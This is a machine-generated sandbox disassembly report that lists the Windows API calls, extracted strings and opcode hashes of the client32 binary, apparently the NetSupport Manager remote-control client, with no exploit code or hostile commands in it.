                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$Item$Delete$Count
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1985338998-0
                                                                                                                                                                                                    • Opcode ID: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                                                                                                    • Instruction ID: 90b1ebb2a37eac89ef99d909188e48f60dab5b42f4deb930a222ec681177ebb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F117C7680421ABBE702DB618CC8AAEFB7CEFC566AF108029F695D2144E7749541CB63
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6AE7
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6AF4
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B01
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B0E
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B1B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B37
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 689D6B47
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 689D6B5D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecrementInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3448037634-0
                                                                                                                                                                                                    • Opcode ID: c7f44c9baa5f47b419578923e97442b5be550ac5ac7343711044cfd9955689bc
                                                                                                                                                                                                    • Instruction ID: 6947b0e03bc9f642a3029c735b103e1469a829ba51db76a1d2553c6d900715e1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7f44c9baa5f47b419578923e97442b5be550ac5ac7343711044cfd9955689bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F111271B04B15A7EB019F69DC84F56BBECAF84748F44842AAA28D7140DB78E410CBE4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(689D6EC0), ref: 689D6A50
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(106A0875), ref: 689D6A5D
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(C68B59FF), ref: 689D6A6A
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(FFEEDAE8), ref: 689D6A77
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(9F730068), ref: 689D6A84
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(9F730068), ref: 689D6AA0
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(F08B0000), ref: 689D6AB0
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(24468A4C), ref: 689D6AC6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: IncrementInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3508698243-0
                                                                                                                                                                                                    • Opcode ID: 241a84372edf6279f932eeecb31f2fa9ed240fa1da996134e166f90f8ac3fe49
                                                                                                                                                                                                    • Instruction ID: 9890f2faead27054ec395f9ebd1d285a82ff12c763b6892b64b711d7eda48f38
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 241a84372edf6279f932eeecb31f2fa9ed240fa1da996134e166f90f8ac3fe49
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8111B71B00A15ABEF01DF79CC84B5BBBECAF40288F84C416AA68D7140DB74E850CBE4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnumWindows.USER32(111276D0,?), ref: 111277D8
                                                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11127829
                                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00000104), ref: 11127869
                                                                                                                                                                                                    • SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,000001F4,?), ref: 11127914
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 11127A0B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateDeleteEnumMessageSendTextTimeoutWindowWindows
                                                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                                                    • API String ID: 2003738596-865373369
                                                                                                                                                                                                    • Opcode ID: cbe101280a819a206175a0f053a5ffed6f628a3f435ccc8d3fb3e29b669eb9f2
                                                                                                                                                                                                    • Instruction ID: daf97ec175890095a15a187f0d211b8f7d4f5fc3452f74960e728b40ba9e4cf9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbe101280a819a206175a0f053a5ffed6f628a3f435ccc8d3fb3e29b669eb9f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE8141B5E006299BDB25CF55CD85BEAF7B8EB48314F5085D5E909A7240EB30AE80CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 689D98D1
                                                                                                                                                                                                      • Part of subcall function 689DD3F5: Sleep.KERNEL32(00000000,689D6F16,00000001,00000214), ref: 689DD41D
                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,?), ref: 689D9A04
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1527402494-0
                                                                                                                                                                                                    • Opcode ID: d0820eb8bf7c7264c41046e89e737961076434d60bdede8d882aff718b795c05
                                                                                                                                                                                                    • Instruction ID: d642ca12bb353b8dfd99deda5ba47e8039b3bfd4436b6ea899d67684f9b48db6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0820eb8bf7c7264c41046e89e737961076434d60bdede8d882aff718b795c05
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71611472A08B058FDB00AF68C998B1D77E8AF06328F94C768D47ADB2D1E730D405CB09
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(00000000,00000000,?), ref: 110791F0
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$idata->pButtonInfo$m_hWnd
                                                                                                                                                                                                    • API String ID: 175691280-4014050597
                                                                                                                                                                                                    • Opcode ID: 6a0f2256c8e02b13d78dae9a1ccdd340c274669d0a1b7722d79473c5eb4af10c
                                                                                                                                                                                                    • Instruction ID: 42ac0ee3d61232f6aa12f5cac541072e802a355f30b727a0d9f027468eebd1c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0f2256c8e02b13d78dae9a1ccdd340c274669d0a1b7722d79473c5eb4af10c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24615074E002299FEB14CF55DC81F9AB7B5BF84314F0080A8E5499B281EB71E994CF95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?), ref: 11065470
                                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 1106549A
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110654D3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 110654F0
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11065581
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms, xrefs: 1106554E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$DecrementEnterEventInterlockedLeaveTimetime
                                                                                                                                                                                                    • String ID: Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms
                                                                                                                                                                                                    • API String ID: 2700130086-2729525473
                                                                                                                                                                                                    • Opcode ID: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
                                                                                                                                                                                                    • Instruction ID: 3b3d7615ea4610ef5d080b5e58bc799fd5b460a4b46124fee3b0225fd41c603b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d77fa92413a1a65b302bc16da95b1b73e0b8ab402638c7d2822101c89923dd69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4418775A00A059FD715CF64C998BAAFBF9FB48348F00855DE82AC7254C731FA00CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D45A
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1101D4AB
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11190240,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D4DE
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1101D4EB
                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 1101D4F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Class$CreateDestroyInfoRectRegister
                                                                                                                                                                                                    • String ID: NSMChatSizeWnd
                                                                                                                                                                                                    • API String ID: 691703853-4119039562
                                                                                                                                                                                                    • Opcode ID: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
                                                                                                                                                                                                    • Instruction ID: dcbcbcf091995d4067a9012f4e3e9d0ed9d195d12c757acb72af4b7ecf5f03b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D63180B5D0121DAFCB10DFA5DDC4AEEFBB8EB48318F20456EF925A3240D73569018B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,BBC4A55B), ref: 1100959B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 11009555, 1100957D
                                                                                                                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009521
                                                                                                                                                                                                    • https://, xrefs: 110094DF
                                                                                                                                                                                                    • http://, xrefs: 110094E5, 110094F8
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009550, 11009578
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                                                                                    • API String ID: 3934441357-3154135529
                                                                                                                                                                                                    • Opcode ID: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction ID: d20e6e8e82cea177770e9d14c68faf5d1120bac870e30f80c07a18668992f196
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71315C75E0065AABDB00DF95DC84FDEB7B8EF49658F004259E825A7280EB35A604CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(00000008,?), ref: 1107F423
                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 1107F42A
                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 1107F479
                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 1107F48A
                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 1107F49B
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 1107F4AF
                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 1107F4C0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Destroy$ImageList_Window$Item
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2011978658-0
                                                                                                                                                                                                    • Opcode ID: 4ef4a5cc33dd472153f747ca7b7130ad6465e017194e93073560657cd39c3bd2
                                                                                                                                                                                                    • Instruction ID: ec4039ea74ad51d6978165d503915976cebcaf838e6cc7621bcf85df41ceaee6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef4a5cc33dd472153f747ca7b7130ad6465e017194e93073560657cd39c3bd2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4216D70E003119BDB10CF68C8C4B5ABBE8BF04318F1185ADED54DB245DB75E945CBA6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CF020: wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009686
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100969B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 1100963D, 11009665
                                                                                                                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009695
                                                                                                                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009609
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009638, 11009660
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 863766397-389219706
                                                                                                                                                                                                    • Opcode ID: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction ID: a1209e8bcef48249843ed2990b636ee265ac836deafb44f4c9fe9e5cc28cb7ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18215E75A0061DABDB00DF95DC81FEEF3B8EF48714F104259E925B3280EB746904CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF), ref: 110655D5
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106568A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterErrorExitLastLeaveMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$ResetCompressor(been_reset=1)$ResetCompressor(flush=1)$idata->compress_idata$idata->tr
                                                                                                                                                                                                    • API String ID: 4291042357-1363257856
                                                                                                                                                                                                    • Opcode ID: b4fa89648e62d340c1c68cf08e8a8579354e9277a1d3320003daeee094152cbc
                                                                                                                                                                                                    • Instruction ID: 2c4b7734daa966d9fa8e91b450ceb5c846ce48a0af7907dd07521c007f0c2814
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fa89648e62d340c1c68cf08e8a8579354e9277a1d3320003daeee094152cbc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121B0B6E00609AFD720CF65DC81FDAF7E8EB04758F004429F52A93640E7757640CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689CDA47
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,?,?,00000000,?), ref: 689CDA6A
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?), ref: 689CDA97
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?), ref: 689CDAA1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                    • String ID: Refcount.cpp$hThread
                                                                                                                                                                                                    • API String ID: 3360349984-1332212576
                                                                                                                                                                                                    • Opcode ID: 1aed249cb3036f2dd716e2553e4cb86e15cc4fadf4cd9d74c1be9d825b11ae2b
                                                                                                                                                                                                    • Instruction ID: ff1687cbd47d539a75bb43de2e29b09202236d2acb9060c47dbcb4278ed7a1ef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1aed249cb3036f2dd716e2553e4cb86e15cc4fadf4cd9d74c1be9d825b11ae2b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01B175388301BFE7248F55DC49F1B7BACEB85725F404228FA1997280D671E405CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
                                                                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 1101D3E1
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1101D3E7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Load$ClassCursorErrorIconLastRegister
                                                                                                                                                                                                    • String ID: 0$Zv
                                                                                                                                                                                                    • API String ID: 1253014879-2782671768
                                                                                                                                                                                                    • Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                                                                                                    • Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003373
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110033A2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF1), ref: 1100343D
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003463
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003492
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
                                                                                                                                                                                                    • Instruction ID: 2e6e1d300c4266612bf4869b02bb9134ae399a8ea59526bbeac45393f23ca2b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0553EF4026A63C61362263C49F8FB6688BC1AA8F120071FA10BE684FD20B00041FB
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
